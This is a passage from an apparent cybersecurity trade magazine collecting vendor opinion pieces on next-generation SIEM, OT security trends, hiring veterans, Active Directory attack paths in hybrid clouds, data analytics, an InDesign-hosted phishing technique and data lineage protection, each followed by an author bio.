often failed to correlate seemingly disparate events across time and continued to focus on known attacks.

As a result, new, unknown, and emerging attacks and variants were easily able to avoid detection.

Furthermore, SIEM were also traditionally plagued by the lack of cloud-native offerings that were built to

handle both cloud and hybrid infrastructures equally.

Today, newer advancements in SIEM are focused in several areas designed to make it the primary

platform for the security operations center (SOC). This includes security monitoring, improved threat

detection, and playbooks to drive faster response. Many EDR, XDR and SIEM solutions that claim to use

ML/AI continue to use rule-based engines with finite models, patterns and signatures that are not updated

fast enough when new attacks are discovered.

However, there are next-gen SIEM solutions incorporating unified security and risk analytics that are

taking the extra step to deliver out-of-the-box advanced data modeling across cloud, user, network, asset,

endpoint, and log telemetry. The few that offer true ML/AI can automatically detect new, unknown, and

emerging attacks, including subtle variants. Along with an understanding of user access and entitlements,

behavioral modeling, and risk metrics, the end goal of next generation SIEM is to streamline every facet

of the SOC. This includes reducing noise and false positives, prioritizing which IoCs need to be

investigated, consolidating data for easier investigations, and providing a high confidence, low-risk

automated response to prevent a successful attack.

What does that mean? Let’s look at the key elements of unified security and risk analytics in a nextgeneration

SIEM.

• Unified Correlation, Continuous Risk Profiling and Behavioral Anomaly Detection – A Nextgeneration

SIEM must unify data collection across the entire infrastructure, on-prem, cloud and

remote, by gathering endpoint, log, user, access, entity/asset, network, and other data to provide

greater context. With risk profiling applied to abnormal behaviors, a behavior-based risk can be

calculated to elevate which events are truly relevant for investigation, or can even be used to

determine an immediate threat with conviction. This shrinks the noise created by false positives

and provides more context to enable a much more targeted response, ideally before an attack

campaign starts to establish itself.



• Identity and Access Analytics – Next-gen SIEM uses Identity Analytics (IdA) leveraging data

science that monitors for and identifies risky access controls, entitlements, user behaviors, and

associated abnormal or deviant activity. These types of advanced analytics data can also serve

key indicators for provisioning, de-provisioning, authentication, and privileged access

management by IAM teams. IdA surpasses human capabilities by leveraging machine learning

models to define, review and confirm accounts and entitlements for access, and works with risk

analytics to prioritize suspicious activity as more malicious.

• Cross-Channel Fraud Prevention – Next-gen SIEM offers modern fraud detection capabilities with

the ability to link data from a multitude of sources to provide a contextual view of what’s happening

in the environment. Such platforms highlight anomalous transactions based on historic user and

community profiles so analysts can initiate investigations or execute automated remediation

actions. It analyzes online and offline activity, including public records, contact center interactions,

point of sale transactions, ATM transactions, and more. It mines and normalizes data and then

creates a risk score for fraud and abuse which can be used for real-time decision making.

The ability to combine these elements to best suit the needs of an organization offer SecOps power and

flexibility when protecting users and the business from data exfiltration, cyber fraud, privilege access

abuse, account compromise and more – using behavior and context. As a result, teams can prioritize

risks and alerts, quickly investigate problems, automate risk response, have a comprehensive view of

case management, conduct contextual natural language search and more, all consolidated into a single

management console.

As the consolidation of security capabilities continues, providers are working to layer on more capabilities

to further unify security, including UEBA, SOAR and XDR. They’re also working to provide better security

and to lower capital and operational requirements, including scaling, training, management, and

maintenance. In addition, security operations teams have long invested and been focused on external

threats. This has led to a lack of monitoring for insider threats. As part of the foundation of a successful

security program, teams must monitor for both external and internal threats. And a mature UEBA set of

capabilities should be incorporated to fully protect the organization.

What questions should you be asking today about your SIEM or to your SIEM provider?

• How is the SIEM platform delivered? The ability to run as a collection of services entirely within

the cloud makes it ideal for risk analysis of security data. Organizations have the advantage of

aggregating and analyzing data from worldwide sources in a single application instance. These

platforms must also scale (both up and down) to accommodate varying workloads. Furthermore,

a cloud-native solution is often easier to maintain over time since the vendor can perform

upgrades quickly, and in real-time.

• Do they offer open analytics and allow teams to easily modify and build customer ML models?

Open analytics are critical for security teams to be able to customize their ML models to suit their

specific needs or build their own models. It’s important to understand exactly what goes into a

model to be confident in its output. With black box analytics, results must be taken on faith since

nobody knows how the answers are obtained, or if the results are valid.



• What are my options for data lake? Where and how data is stored is a critical factor in the flexibility,

speed, quality, and cost of security data processing, ingestion, and storage. Open choice of big

data offers major economic advantages over traditional data warehouses for scaling to terabytes

or petabytes. It’s imperative that a SIEM platform works with what you already have or plan to

purchase versus being locked into a proprietary vendor data lake.

• What does the risk modeling approach look like? Look for a platform that offers self-learning, selftraining,

and contextually aware algorithms that score every transaction as they’re evaluated in

near real time. This requires a comprehensive risk engine that performs continuous risk scoring

and can provide real time risk prioritized alerts for incident analysis. The risk scoring framework

needs to roll up risk scores from multiple contributing elements (with the ability to deliver

normalized user and entity risk scores). As a result, a finite number of targeted response actions

can be defined that are both targeted and driven by high-fidelity automation, and thereby

accelerating threat response.

SIEM is not just about ingesting data sources. To empower security teams these solutions must deliver

a variety of capabilities. This includes providing actionable context of the ingested data, reducing noise,

and identifying and prioritizing the right events associated with an attack. It also means delivering highly

accurate and targeted investigation capabilities with confirmation of the attack and high-confidence

automated responses. Finally, these solutions need to thwart the successful detonation of ransomware

or the execution of the main attack purpose (corruption, disruption, or theft).

A next-generation SIEM with unified security and risk analytics should be the core of a successful security

operations program. Security teams must evaluate innovative technologies that continue to improve and

consolidate analytical capabilities to provide a more usable platform that also improves the ROI of the

SOC program.

About the Author

Sanjay Raja brings over 20 years of experience in building, marketing

and selling cyber security and networking solutions to enterprises,

medium-to-small business, and managed service providers.

Previously, Sanjay was VP of Marketing at Prevailion, a cyber

intelligence startup. Sanjay has also several successful leadership

roles in Marketing, Product Strategy, Alliances and Engineering at

Digital Defense (acquired by Help Systems), Lumeta (acquired by

Firemon), RSA (Netwitness), Cisco Systems, HP Enterprise

Security, Crossbeam Systems, Arbor Networks, Top Layer

Networks, Caw Networks (acquired by Spirent Communications),

Nexsi Systems, 3Com, and Cabletron Systems. Sanjay holds a

B.S.EE and an MBA from Worcester Polytechnic Institute.

Sanjay can be reached online at our company website https://gurucul.com



Tips And Trends for OT Cybersecurity In 2022: More

SOAR, Cyber Hygiene And Renewed Compliance

By Peter Lund, Vice President of Product Management at OT security company Industrial

Defender

As of February 2022, we’re already witnessing an increased focus on OT cybersecurity — and for good

reason. The Biden Administration has announced a new plan to secure U.S. water systems from

cyberattacks, an unfortunate signal that bad actors are targeting utilities and threatening what Americans

typically view as guarantees. Water, gas, and electricity are all at risk of being contaminated, interfered

with, or even halted, as was the case with the Colonial Pipeline ransomware attack.

Despite the imminent threats, I predict the below trends will help security professionals protect OT

systems this year:

Reinforcing today’s standards of security

In 2022, we’ll see traditional managed security service providers offer OT services to stay at the forefront

of the industry. This trend is already apparent with Deloitte's recent acquisition of OT security provider

aeSolutions.



Additionally, we’ll witness the return to basic hygiene and reliance on preventative controls over threat

intelligence. Threat intelligence is a go-to strategy for many in the industry. However, knowing what bad

actors exist has little benefit for enterprises if they don't know if the doors and windows (firewalls and

remote access) of their organization are locked. I would go as far as saying is many organizations still

don't know how many doors and windows they have. Taking a step back, 2022 will welcome a renewed

focus on basic hygiene.

Introducing OT cybersecurity's 2022 innovations

Security Orchestration, Automation and Response (SOAR) is standard practice in IT. As the year

continues onward, we'll see more OT cybersecurity experts lean on these guidelines within their own

practice.

Additionally, OT passive monitoring solutions will need to expand active data collection capabilities. Many

enterprises rely on outdated monitoring solutions that don't account for real-time data collection. To better

manage OT assets, it will be crucial to expand data collection capabilities.

Finally, Software Bills of Materials (SBOMs) will remain trendy, but adoption will lag because of OEMs. If

the ongoing log4j vulnerability saga has taught us anything, it’s that SBOMs are not optional.

Unfortunately, until we get buy-in from the major OEMs that supply the hardware and software that keep

the lights on, customers and security vendors will be behind the eight-ball when it comes to data accuracy

and integrity. Hopefully log4j will be a catalyst to get the industry to agree on a standard for publishing

and sharing SBOM data.

Focusing on the big picture

As alternative energy sources gain prominence, we'll see an increased focus on OT security for

renewable energy sources, by and large renewables have been able to fly under the radar when it comes

to regulations like NERC as well. As we become more and more reliant on renewables we need to ensure

that they are protected, hopefully before a catastrophic event causes a widespread outage.

As more industries work to stay compliant, the U.S. government will simultaneously double down on the

NIST Cybersecurity Framework for standard cybersecurity controls. In 2022, we can expect NIST to

continue to provide additional updates and recommendations as it aims to standardize cybersecurity

controls. The NIST Cybersecurity Framework is essential for enterprises looking to check its

cybersecurity boxes.

What’s next?

Organizations have reason to be wary of cyberattacks in 2022, but security professionals can breathe a

sigh of relief when tackling the year with a strategic, three-pronged approach. Enterprises must revisit

basic hygiene measures, adopt the latest and greatest tools to stay protected, and remain focused on



the big picture of what’s going on across the United States and in the industry as a whole. Bad actors are

out to cause disruption, but organizations can stay protected with these tips and trends in mind.

About the Author

Peter has a strong technical and business background with over 15

years of experience working with and for IT and OT product companies.

Over the last five years, Peter was instrumental in bringing new features

to the market for Industrial Defender. In addition to his product

management role, he utilizes a wide range of experience in application

development, systems engineering and marketing. Prior to working with

Industrial Defender, Peter held roles at Dell EMC, Schneider Electric

and KVH Industries.



Top 10 Reasons Cyber Defense Firms Should Hire

Veterans

Technology expert and former military intelligence officer shares insight on the valuable skills

that veterans can bring to the cybersecurity industry

By Bryon Kroger, Founder of Rise8

Following the onset of the global pandemic, the number of data records compromised by cyberattacks

more than doubled from the year prior, from some 15,432 in 2019 to over 37,000 in 2020. Last year, in

2021, malicious cyberattacks remained a present threat as hackers attacked the Colonial Pipeline with

ransomware, and CISA director Jen Easterly noted a massive flaw in Apache’s Log4j logging library that

potentially left hundreds of millions of user devices vulnerable.

Unfortunately, as the real and present threat of additional attacks and vulnerabilities continues to

increase, and the technology used in successful attacks and data breaches becomes more sophisticated,

the cybersecurity industry remains heavily understaffed. According to the National Initiative for



Cybersecurity Education, the global shortage of qualified cybersecurity personnel is approaching nearly

3 million.

With such a massive shortage of workers, cybersecurity leaders and professionals should look to hire

one sector of the US workforce where applicants are not only in high demand, but also where many are

already certified or qualified in cybersecurity—veterans. In this article, I will list my top 10 reasons and

explain why firms should hire veterans to address critical gaps in their workforce and cybersecurity

defenses.

1. Veterans are accustomed to the responsibilities of leadership

Whether it’s the lessons learned from the first week of boot camp, the first night of a field operation, or

the morning before giving a briefing, military service trains veterans from day 1 to understand the

importance of leadership. In the realm of cybersecurity, it is often the quality of leaders that determines

a firm’s ability to react and respond to potential threats (or present ones) in a timely manner. In the

military, strong leadership could spell the difference between life or death. For cybersecurity firms, hiring

veterans with leadership experience could spell the difference between overcoming and blocking a

distinct threat, or allowing it to breach their (or their clients’) private data.

2. Most Vets are comfortable in fast-paced environments

If there is one word that sums up the active-duty lifestyle, it’s “intensity.” During their time in the military,

veterans learn how to adapt to and become comfortable with ever-changing fast-paced environments,

often with the high-stakes factor of civilians involved as some form of collateral. In cyber defense, the

high-stakes game transitions to one of veterans protecting themselves, their team, as well as civilians

from malicious digital attacks. As such, veterans are already able to place themselves in a mindset that

makes them a prime candidate for the cyber defense industry. Additionally, veterans may be better adept

at navigating their peers through potential cyber crises and emerging victorious once a threat is

addressed and nullified.

3. Veterans value and respect constructive feedback

In many field operations during their time in active duty service, one luxury many veterans are not able

to find is the ability to try again if their operation results in failure. However, trial and error is at the

foundation of cyber defense; being able to learn what a threat is as well as how to best assess it and

work around it is at the core of cybersecurity. Knowing this, many veterans in the cyber defense industry

will find their mentors and/or leaders offering constructive feedback and criticism of their performance,

spurring them to do better next time against the next inevitable threat, regardless of when or where it

occurs.



4. Teamwork and individual responsibility is at the heart of military training

The ability to get the job done no matter work, whether individually or as part of a team, is a mindset

almost every veteran is trained to possess. As a result, veterans inherently hold stronger feelings of

personal accountability and accomplishment regarding the success of their mission. Being able to

operate as an individual professional that is part of a team equipped to handle outside threats — in which

each individual is accountable for specific metrics of success — is at the heart of both military and cyber

defense training. In the event that a cyber defense firm faces a crisis, veterans are one demographic of

employees best apt to help that firm navigate the intricacies of such an occurrence.

5. Veterans find purpose in delivering meaningful results

Along with teamwork and leadership, the mindset of completing a mission no matter what also helps

drives veterans towards delivering impactful results that their service provides others. In the realm of

cybersecurity and cyber defense, those results could mean the difference between a firm’s longevity and

continued success or its failure if it faces a substantial digital threat. Veterans in the industry are able to

clearly understand how their performance directly impacts not only their team, leaders, and others around

them, but also outside individuals with a stake in the success of their mission. Having this results-oriented

mindset is what helps make veterans such valuable workers to the cyber defense firms that employ them.

6. Vets are mission driven

Whenever an active-duty veteran is instructed on what their mission means for the bigger picture, it helps

instill a sense of purpose. For veterans in cyber defense and cybersecurity, that purpose is derived from

the additional layers of digital protection their work and expertise provide others. When a veteran in cyber

defense understands their purpose is to uphold the integrity of private data and information, they dedicate

themselves to upholding that purpose, providing the firms who employ them and their clients with

additional means of protecting their data, which provides over-arching value to the cyber defense industry

as a whole

7. Dependability is vital both in military and cybersecurity service

Veterans are taught to understand that any individual or service — no matter how vital — is only as

valuable as it is dependable; including themselves. For instance, if a core technology a veteran relies on

to conduct their daily tasks becomes unreliable, or a newer/better technology emerges, veterans are

taught to seek out the reliability and value it could bring to their service. LIkewise, dependability is crucial

to the ongoing success of firms within the cyber defense industry, as their services rely upon an ability to

protect and bolster the defenses of vulnerable users and data.



8. Vets understand the emphasis of structure and clarity

Without a clearly defined structure, no organization will be able to achieve success or maintain that

success in the long run. Structure, however, is one of the core building blocks that military service helps

instill in veterans, and many veterans seek out that structure in the private sector after their military

service formally concludes. Therefore, many veterans will find themselves thriving in a role at a cyber

defense firm that offers them a similar sense of structure, as well as clarity regarding their purpose within

the organization. Through finding these, veterans are inherently able to rely upon their military training to

continue providing value to the firms they work for.

9. Vets are focused on the impact of driving meaningful change

If you ask a room full of veterans why they initially decided to join the military, most of the responses you

receive are bound to fall along the lines of their desire to be a part of meaningful, positive change in the

world. That meaningful change is precisely what the cybersecurity industry seeks to provide its clients in

the face of an ever-growing and ever-changing digital landscape. In transitioning to cyber defense roles,

veterans are able to carry that focus on driving impactful change into meaningful work in the private

sector, leaning on their military training and background to provide a positive service that protects

everyday people.

10. Veterans are taught how to combat threats and take risks

At its heart, military service teaches veterans how to react to threats of virtually any degree and respond

to them accordingly. In the realm of cyber defense, those threats are as numerous as they are varied in

their potential intensity. Additionally, veterans understand that responding to threats in a timely and

responsible manner can entail the need to take risks—another commonality shared in cybersecurity.

Veterans who seek to transition their skills into the private cyber defense sector are valuable to the firms

which might employ them since they already possess this mindset; they know the importance of their

skills and the purpose they serve in protecting others. Because veterans are inherently trained on how to

combat and overcome threats, even in high-risk situations, this makes them a valuable pool of candidates

for the greater cybersecurity industry.

About the Author

Bryon Kroger is the founder of Rise8, which places the bureaucracy of

the US military and the technological innovations of Silicon Valley in the

same realm. As a veteran of the US Air Force, and co-founder of the

DoD’s first software factory Kessel Run, Kroger is bridging the gap

between the archaic practices of govtech and the speed that Silicon

Valley startups are known for. Bryon can be reached online at

bryon@rise8.com and at our company website https://rise8.us/.



5 Reasons Organizations Need Comprehensive AD

Security Across Cloud and On-Prem

Why Organizations Need to Secure Directory Services in a Hybrid Deployment from

Attack Paths

By Justin Kohler, Director of BloodHound Enterprise at SpecterOps

Microsoft Active Directory is one of the most common identity and access management platforms in the

world, which unfortunately makes it a prime target for attackers. Attack Paths in Active Directory (AD)

can give attackers nearly unlimited access to the rest of the network, allowing them to steal sensitive

information and deploy malware while avoiding detection. Like many other things in security, the task of

securing AD gets more complex as organizations move workloads to the cloud. The public cloud

providers have their own IAM infrastructure (Azure AD & Azure Resource Manager in Azure, IAM and

AWS Organizations in Amazon Web Services, etc.) that organizations need to defend along with onpremises

AD. Hybrid environments allow attacks to move from on-premises AD to the cloud or in reverse,

making use of weak spots in both. Comprehensive protection is the best way to ensure the organization’s

sensitive data remains safe.



Here are five reasons that organizations need to secure directory services in a hybrid deployment.

1. As cloud use grows, attackers are following the data

In October 2021, Microsoft reported that Azure and other cloud services grew 50% year over year in Q4

2021 and have grown between 47% and 62% every quarter since Q2 2020. The Covid-19 pandemic

accelerated the shift to the cloud across many industries, and the momentum hasn’t slowed down. As

data has moved to the cloud, malware has followed. A survey of CISOs conducted by IDC in mid-2021

found that 98% of respondents suffered at least one cloud data breach in the previous 18 months as

opposed to 79% in 2020. There’s every reason to believe that adversaries will continue to target the cloud

aggressively in 2022. Security and cloud teams should ensure they are not leaving gaps that attackers

can exploit in their identity and access management infrastructure that make it easier for adversaries to

target them.

2. The rapid rate of change in the cloud creates uncertainty and risk

Cloud platforms are still being actively developed, which means the underlying software changes

frequently, Cloud products and tools get merged with other products, removed, or overhauled on a regular

basis. This volatility increases security risk because it prevents security experts, whether they work inhouse,

for a service provider or as a consultant, from understanding the cloud platform in detail. Every

time something changes, security pros need to re-learn how it works, what its weaknesses are and how

to protect it. Until they do, they’re more likely to make mistakes, overlook security gaps or implement

insecure misconfigurations. Since cloud platforms are relatively new compared to on-premises software,

the talent pool and library of third-party resources for securing them are small to start with. These factors

make the cloud especially risky, and forces organizations to continuously revise their cloud security

policies - increasing the changes something will slip through the cracks.

For comparison, Microsoft Active Directory has been used for identity and access management onpremises

for two decades. There are a huge number of AD admins that understand the software inside

and out and an enormous library of third-party resources to help them do their job quickly and safely.

While many organizations still struggle to secure AD on-premises, AD security in the cloud has additional

barriers to security that make it even more important that security and cloud teams take it seriously.

3. The cloud has a larger attack surface and authentication is more complex than

on-premises

Cloud authentication systems are easier for attackers to exploit in some ways. First, they simply have a

larger attack surface. These systems are exposed to the internet by default, where on-premises AD is

closed to the internet by default. With on-premises AD, adversaries first needed access to the network

through a user’s credentials. In the cloud, they don’t even need that.

The systems that assign permissions to specific users or groups in the major cloud platforms also tend

to be more complex than they are in on-premises AD. For example, Azure AD uses at least three separate



systems to manage identity and access: Azure Active Directory, Azure Resource Manager, and the Azure

API Apps permissions system. Unfortunately, these systems can often conflict and make it unclear which

system is the source of truth. This makes it more difficult for security teams to audit who has access to

valuable systems, which in turn makes it harder for them to find and close down Attack Paths.

The more difficult it is to assign permissions, the more likely that Cloud or AD engineers will give blanket

permissions to large groups of users or give a problem user admin access to just make everything work.

After all, their main task is to ensure employees have access to the systems they need to do their jobs.

This complexity creates additional attack paths and undermines the expertise of security and Identity

Access Management engineers.

4. Attacks can move from Azure to on-prem AD

Attack Paths in AD don’t just stay on-premise or in the cloud; they can cross between environments. For

example, adversaries can move laterally from on-premise AD to Azure AD, escalate privilege within

Azure, and then move back from Azure to on-premise. They can do this by abusing Microsoft Endpoint

Manager to move laterally from an Azure tenant to an on-prem AD domain. This abuse becomes possible

when Windows devices have been Hybrid-Joined to both the Azure tenant and the on-prem Active

Directory domain. This attack can be carried out by Azure tenant authenticated user — no special

privileges or roles needed. Abusing one of the three endpoint management systems to execute

PowerShell scripts on hybrid-joined devices requires either the “Global Admin” or “Intune Administrator”

roles. This is why it’s vital to protect Active Directory both on-premises and in the cloud - because both

of them give attackers a way in.

5. Attack Paths open orgs up to dangerous attacks like ransomware

Attack Paths are a way for adversaries to get powerful access that lets them steal sensitive data, deploy

ransomware or other malware, achieve persistence in the network or add backdoors that will allow them

to instantly re-gain privileged access in the future. An adversary that is well versed in attacking AD (and

most adversaries are) can gain privileges and move freely across Attack Paths leaving minimal risk of

discovery from defenders, achieve persistence, and gain the keys to the kingdom. Ransomware is a

particularly active threat at the moment; approximately 37% of global organizations said they were the

victim of some form of ransomware attack in 2021, according to IDC's "2021 Ransomware Study." The

FBI's Internet Crime Complaint Center received 62% more ransomware reports year-over-year in the first

half of 2021. To reduce their vulnerability to all these attacks and stop problems like ransomware at their

source, organizations should work on eliminating the Attack Paths in their AD environment.

Identity and access management on-premises and in the cloud are two sides of the same coin.

Organizations with a hybrid infrastructure model must protect both in order to keep their users and data

safe.



About the Author

Justin Kohler is the director for the BloodHound Enterprise product

line at SpecterOps. He is an operations expert who has over a decade

of experience in project and program development. After beginning

his career in the US Air Force, he worked for several consulting firms

focused on process and workflow optimization and held positions at

Microsoft and Gigamon. He enjoys building and leading teams

focused on customer delivery at Fortune 500 companies.

Justin can be reached online at @JustinKohler10 and at our company

website https://bloodhoundenterprise.io/



Directed Analytics - The Future of Data Management

By Simon Rolph, CEO & Founder of Such Sweet Thunder

The world as we know it has changed - it’s undisputed. Industries of all kinds face a wholly

different landscape compared to 18 months ago, and the data industry is no exception. With

each step we take into this new environment, new technologies are being developed to fit unique

business needs, ultimately improving our capabilities.

The data analytics industry has proliferated in recent years, with the global market expected to

value $132.9 billion by 2026, a nearly 500% growth from its valuation of $23 billion in 2019. As

an evolution of data analytics, directed data analytics is an essential step in making efficient and

accurate business decisions.

Defining directed analytics

In comparison to traditional data analytics, directed data analytics offers rapid information about

new trends in the market. This allows companies to make data-driven decisions faster, reducing

the delay between analysis and action. Ultimately, data has a short life span, and in today’s fastmoving

world it is vital to act on data as quickly as possible.



Not only this, directed data analytics means companies can stay on top of a continuous and

increasing stream of data, allowing more extensive databases to be built whilst allowing for

analysis on a wider scale.

directed data analytics aims to move on from the digital dashboard approach that has been a

core part of the industry for so long. Whilst dashboards are fit for the purpose they were created

for, businesses are now looking for solutions that are fluid and fast-changing. Dashboards can’t

provide the speed to keep up with the rapid onslaught of data that exists in the modern world.

Similarly, when dashboards first emerged, they weren’t just a big step forward for data

management - they were also a significant advance for MIS (Management Information Systems)

and EIS (Executive Information Systems). However, they haven’t yet evolved sufficiently to

continue to be efficient and effective in this area.

Being directed in a competitive landscape

Directed data analytics offers the next generation of data reporting, providing a multitude of data

in a short period, displayed in a customised way that is fit for the user and company, and

compiling the data into a broader industry context in order to visualise long-term trends and

patterns. This approach is crucial for businesses to remain competitive and stay ahead; with

industries changing at a rapid pace and global events happening on an unprecedented scale.

Providing feedback on product performance, marketing strategies and customer experience,

directed analytics is fundamental for businesses in today’s climate. Without this crucial, timely

information, leaders cannot confidently make decisions that will allow them to improve

performance, profitability and employee satisfaction.

The future of data analysis

Many companies have the data analysis tools and infrastructure they need, but the analysis fails

to have a more comprehensive business impact due to red tape and lack of agility. Data can

often remain stuck in dashboards, reports aren’t circulated to the relevant people, and crucial

insights don’t reach senior decision-makers.

The distinction here is that the technology is widely available and often already implemented;

however, it is the corresponding data analysis that fails to have an impact. It’s what the data

means that needs to be communicated, not the data itself.



Directed analytics allow these insights to become a part of everyday workflows. Integrating

insights into a business’ existing workspaces and tools means that users don’t need to access

specific dashboards or applications to find the data and then analyse it themselves. The future

of directed analytics will mean that employees can ask questions and get simple, straightforward

answers grounded in data, allowing them to work seamlessly, and make smarter decisions at a

faster rate.

In order to progress, the directed data analytics industry needs to become almost invisible; so

seamlessly integrated and providing insights so effortlessly that it causes no disruption to

business’ daily operations.

About the Author

Simon Rolph, CEO & Founder of Such Sweet Thunder. Simon is the

founder of data analytics firm, Such Sweet Thunder, and has been

CEO since its inception in 2007. As an experienced interim software

engineer, business analyst and IT project manager, specialising in

Data Management and Analysis projects, Simon has over 25 years

of successfully delivering complex, high-value cross sector projects

and programmes for ‘Blue Chip’ internationally renowned

organisations.

Simon’s goal as CEO of Sweet Thunder is an aim to create a great

environment for people to work delivering simple solutions to complex

problems that make a tangible difference for our clients.

Simon can be reached at our company website https://www.sweetthunder.co.uk/



Phishing Techniques in Disguise: What to Look for And

Why You Should

By By Rotem Shemesh, Lead Product Marketing Manager, Security Solutions, at Datto

Phishing is a familiar concept to cybersecurity professionals - and hackers. According to a recent study,

phishing attacks are the method of choice of cyber criminals attempting to infiltrate an organization. Why?

Because they are easy to deploy and the opportunity for human error when clicking on a phishing email

is high.

When many of us hear the term “phishing” we may picture an obvious spam email that came from an

easily recognizable fake email address. But it isn’t always that simple to spot a phishing attempt. It’s

important to educate organizations on ways to avoid falling victim to phishing attempts, including how to

identify the different shapes they can come in. Recently, Datto SaaS Defense detected a threat that was

disguised as a communication hosted on a trusted domain, which enabled the attackers to operate below

the radar of detection.

New technique bypasses security detection

This new phishing technique included two key elements that made it impossible for most security

solutions to detect. The attack leveraged Adobe InDesign hosting reputation to hide a malicious link in

an inframe. With the goal of harvesting users’ credentials, the attack was sent via email to lure users into

clicking a link to access a shared document. The link directed people to a fake webpage designed using



InDesign and uploaded to indd.adobe.com, a legitimate URL. Hosting a phishing attack in a known URL

is not uncommon, but this was the first time we saw it done in InDesign. The InDesign domain also has

certain characteristics that enabled the bad actors to conceal the malware; the link was hidden in an

image (something that is possible in InDesign) and therefore was not identified as a URL when scanned

by many security solutions. This masking technique enables attackers to avoid raising suspicions and

bypass many email detection measures.

This was the first time this type of technique was confirmed as a phishing attack; luckily, it was uncovered

before causing serious damage. But, this new type of threat shows just how constant - and dangerous -

the evolution of the cybersecurity landscape is. Cyber criminals are, unfortunately, usually one step

ahead of their targets, and it’s critical to stay up to date on the latest techniques being used to best protect

yourself and your organization. To build a strong cyber detection and prevention plan against phishing

attempts, there are many steps companies can, and should take.

Prepare for the worst

So, what are companies or security-based solutions supposed to do when faced with a tricky challenge

like this one?

The first step is to ensure your organization has the most up-to-date and advanced security protections

in place. Basic email security is not enough - it’s critical to have a security platform in place that can

detect more advanced and emerging phishing techniques, especially the ones that have not yet been

discovered or even developed. It’s also more important than ever that organizations adopt an assumed

breach mentality: plan for when a cyber attack will happen, not if. Remote work and increased use of

cloud-based SaaS platforms are essentially invitations to bad actors. As useful as these technologies

are, it opens up gaps for malware to enter a system when you least expect it.

Implementing security solutions to help with detection and prevention are important, but it’s even more

necessary to develop cyber resilience in your company. A strong cybersecurity approach is one that

starts with an assumed breach mentality within an organization, and ends with building a cyber resilience

foundation. Cyber resilience is not a product or attitude, but rather an ongoing journey with an evolving

mindset to grow as new threats and technologies continue to emerge. Together with an assumed-breach,

cyber-resilient culture, your company will not only be prepared for the next vulnerability around the corner,

but also will have the ability to respond and quickly recover from an adverse cyber event.

In an ever-changing digital environment, security can no longer afford to be afterthought. It is the

responsibility of each organization to ensure that when a threat emerges, they are able to minimize the

risk to prevent the attack from growing and wreaking havoc on themselves or others, such as their

customers. It is too easy for cyber attacks to quickly spread and have a ripple effect that can impact

thousands. As dangerous cyber criminals become smarter, we must too, and take the proper steps to

fight back.



About the Author

Rotem Shemesh is the Lead Product Marketing Manager for

Security Solutions at Datto and plays a significant role in

expanding and positioning Datto’s cybersecurity offerings. She

was the head of marketing at BitDam and was responsible for all

marketing and Go-to-Market efforts for 3 years. At BitDam, when

it was a small cybersecurity start-up, she established the

company’s marketing efforts from the ground up and was

instrumental in the company’s success over the years, as well as

the effective merge with Datto. Building BitDam’s marketing

strategy, messaging and brand, as well as driving demand

generation, communications, and channel marketing, she

successfully positioned the company as a disruptive

cybersecurity startup well recognized by the market, analysts, journalists, and other industry players.

Rotem can be reached online at @ShemeshRotem and at our company website Datto.com



Are You Prepared for the New Normal of Jekyll and Hyde

Data?

An organization’s data and secrets are simultaneously its greatest assets and its greatest

risks.

By Howard Ting, CEO, Cyberhaven

Recently Twitch suffered a devastating hack that exposed its most sensitive data and intellectual property

including source code, unreleased product information, streamer earnings, and more. For security teams

and enterprise leaders, this attack should make the hair on the back of their necks stand up. This is a

worst-case scenario breach, designed to cause maximum disruption, and yet, there wasn’t any regulated

data in sight.

The attack was all about exposing the IP and trade secrets of the business itself. Recent ransomware

attacks have followed a similar blueprint by threatening to expose an organization’s secrets. This changes

how an organization must view the risk to its data. While a traditional ransomware attack can be

measured in downtime, when secrets are published, the damage is permanent. Data risk must now be

viewed in truly strategic terms, not just operational.

Coincidentally, this was the same week that Facebook was once again scrambling to contain the fallout

from leaked internal documents and information. These events require organizations to reassess how

they use and protect their most sensitive data. It isn’t enough to simply quarantine away PCI or HIPAAregulated

data and call it a day. Virtually all enterprise data is now in play when it comes to risk. Yet at

the same time, data is being shared more than ever before, and collaboration is an essential part of



modern work. Organizations must be ready to navigate this apparent paradox to get the most out of their

data while minimizing the risk.

The Two Faces of Enterprise Data

An organization’s data and secrets are simultaneously its greatest assets and its greatest risks. On its

good side, data is the oxygen that keeps the enterprise alive and lets it thrive. And like oxygen, data

needs to move and be consumed so that users can collaborate and create. And today this sharing occurs

across a constantly evolving suite of applications and services including sanctioned enterprise apps as

well as personal use apps.

Yet all this sharing and collaboration opens the door to loss, misuse, or abuse of that data and can

transform data from Jekyll to Hyde. Viewed from the perspective of risk, data is less of a life-giving oxygen

and more like a self-spreading, self-replicating virus. Every user that downloads sensitive data could

potentially make a copy. Data could be copy/pasted into another file, uploaded to a personal cloud, or

shared via chat, personal email, or countless other methods. Every data access can turn into a number

of unseen derivatives, each with its own potential for loss or misuse.

Focus on the Data Actions

So which is it? Is our data oxygen or a toxic virus? The answer is that it is both. The difference between

data being nourishing or toxic depends on the actions and context surrounding it. The good or bad rests

in how the data moves, is modified, and shared. Just as importantly, we need to know the data’s history.

Where did the data come from? What user or app created it and how has it changed? So not only do we

need to know the actions surrounding a piece of data, we need to know its lineage.

The Way Forward

Organizations need a new approach to data security that can provide this lineage and resolve the Jekyll

and Hyde problem by passively watching how data is created, modified, and shared. Every action must

be tracked and correlated to build a complete history of every piece of data. This opens up a far more

powerful approach to securing data that lets organizations do the following:

• Secure Any Type of Data - Any data can be traced and analyzed without the need for signatures

or tagging. This lets organizations protect virtually any type of IP or content based on its actual

value to the enterprise. Source code, ML models, financial projections, and product designs can

all easily be protected equally.

• Safely Enable Work and Collaboration - Users need to share and collaborate to do work without

losing control. Policies can align with business processes to define how data can be shared and

with whom while preventing oversharing or misuse.



• Find Unseen Risk - The hardest part of security is often to control the “unknown unknowns”.

Enterprises need a tool that automatically and continuously traces all data, which can find

sensitive data in places the security team didn’t even know to look.

In the end, data doesn’t have to be treated as Jekyll or Hyde. Instead, security policies can automatically

follow the true value to the enterprise and adapt to how it is actually being used.

About the Author

Howard Ting is the CEO of Cyberhaven. Howard Ting joined

Cyberhaven as CEO in June 2020. In the past decade, Howard has

played a critical role in scaling Palo Alto Networks and Nutanix from

initial sales to over $1B in revenue, generating massive value for

customers, employees, and shareholders. Howard has also served

in GTM and product roles at Redis Labs, Zscaler, Microsoft, and

RSA Security. Howard can be reached on Twitter and at our

company website https://www.cyberhaven.com/.



How To Defend Railway Subsystems from Targeted

Cyber-Attacks

By Michael Cheng, Director at TXOne Networks & C. Max. Farrell, Senior Technical Marketing

Specialist at TXOne Networks

Railways are a critical part of every nation’s vital system. Maintaining the constant operation of railway

